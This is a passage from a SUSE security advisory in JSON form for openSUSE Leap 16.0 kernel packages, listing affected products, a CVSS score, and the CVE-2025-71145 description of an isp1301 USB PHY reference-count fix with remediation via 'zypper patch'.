"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71143"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
